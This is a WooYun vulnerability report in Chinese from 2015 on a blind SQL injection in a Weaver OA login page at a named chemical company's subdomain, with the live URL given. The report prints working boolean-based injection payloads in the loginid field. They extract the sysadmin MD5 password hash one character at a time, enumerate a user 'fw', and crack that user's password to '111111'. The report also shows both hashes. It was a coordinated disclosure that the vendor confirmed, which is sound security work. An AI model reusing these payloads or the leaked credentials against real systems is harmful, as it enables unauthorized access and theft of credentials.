当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134901

漏洞标题:华润化工控股有限公司某分站存在SQL 注入漏洞,泄漏大量信息

相关厂商:华润化工控股有限公司

漏洞作者: 浮萍

提交时间:2015-08-18 12:45

修复时间:2015-10-02 13:00

公开时间:2015-10-02 13:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-18: 细节已通知厂商并且等待厂商处理中
2015-08-18: 厂商已经确认,细节仅向厂商公开
2015-08-28: 细节向核心白帽子及相关领域专家公开
2015-09-07: 细节向普通白帽子公开
2015-09-17: 细节向实习白帽子公开
2015-10-02: 细节向公众公开

简要描述:

SQL注入

详细说明:

采用的泛微系统
http://eip.crcchem.com:89/login.do
存在sql注入
当输入任意用户名密码时
会提示用户未找到

选区_144.png


当输入存在的用户名时
会提示登录密码不正确

选区_145.png


用户名输入sysadmin'and'1'='1时 返回密码不正确

选区_146.png


loginid=sysadmin' and length(password)=32 and'1'='1&password=z&authcode=&dynapass=&tokenpass=&clienttype=Webclient&clientver=4.5&language=&country=&verify=&needdyna=


密码加密后的长度为32位
猜解密码

选区_147.png


选区_148.png


选区_149.png


loginid=sysadmin' and ascii(substr(password,1,1))=56 and'1'='1&password=z&authcode=&dynapass=&tokenpass=&clienttype=Webclient&clientver=4.5&language=&country=&verify=&needdyna=


可猜解出来第一位对应的ascii为56 即为8

选区_152.png


可猜解出sysadmin对应的密码

选区_143.png


sysadmin密码为

8D5E057546204DEC90D32839683E1DB3


未解密成功

漏洞证明:

再获取一个用户

loginid=a' or  length(loginid) =2 and'1'='1&password=z&authcode=&dynapass=&tokenpass=&clienttype=Webclient&clientver=4.5&language=&country=&verify=&needdyna=


选区_150.png


说明存在长度为2的用户

loginid=a'or length(loginid)=2 and ascii(substr(loginid,1,1)) =102 and '1'='1&password=z&authcode=&dynapass=&tokenpass=&clienttype=Webclient&clientver=4.5&language=&country=&verify=&needdyna=
loginid=a'or length(loginid)=2 and ascii(substr(loginid,1,1)) =102 and ascii(substr(loginid,2,1)) =119 and '1'='1&password=z&authcode=&dynapass=&tokenpass=&clienttype=Webclient&clientver=4.5&language=&country=&verify=&needdyna=


该对应的用户为fw
然后使用脚本
跑出密码

选区_151.png


fw对应密码为96E79218965EB72C92A549DD5A330112
解密后为111111
登录

选区_153.png


选区_154.png


选区_155.png


登录后应该也存在sql注入
这里不测试了
然后也可以登录http://eip.crcchem.com/login/Login.jsp?logintype=1

选区_156.png


通讯录

选区_157.png


其他信息就不查看了

修复方案:

版权声明:转载请注明来源 浮萍@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-08-18 12:59

厂商回复:

很细心,满分,换我很可能忽略过去了,不过审代码应该会再审出来,已通知化工

最新状态:

暂无


漏洞评价:

评论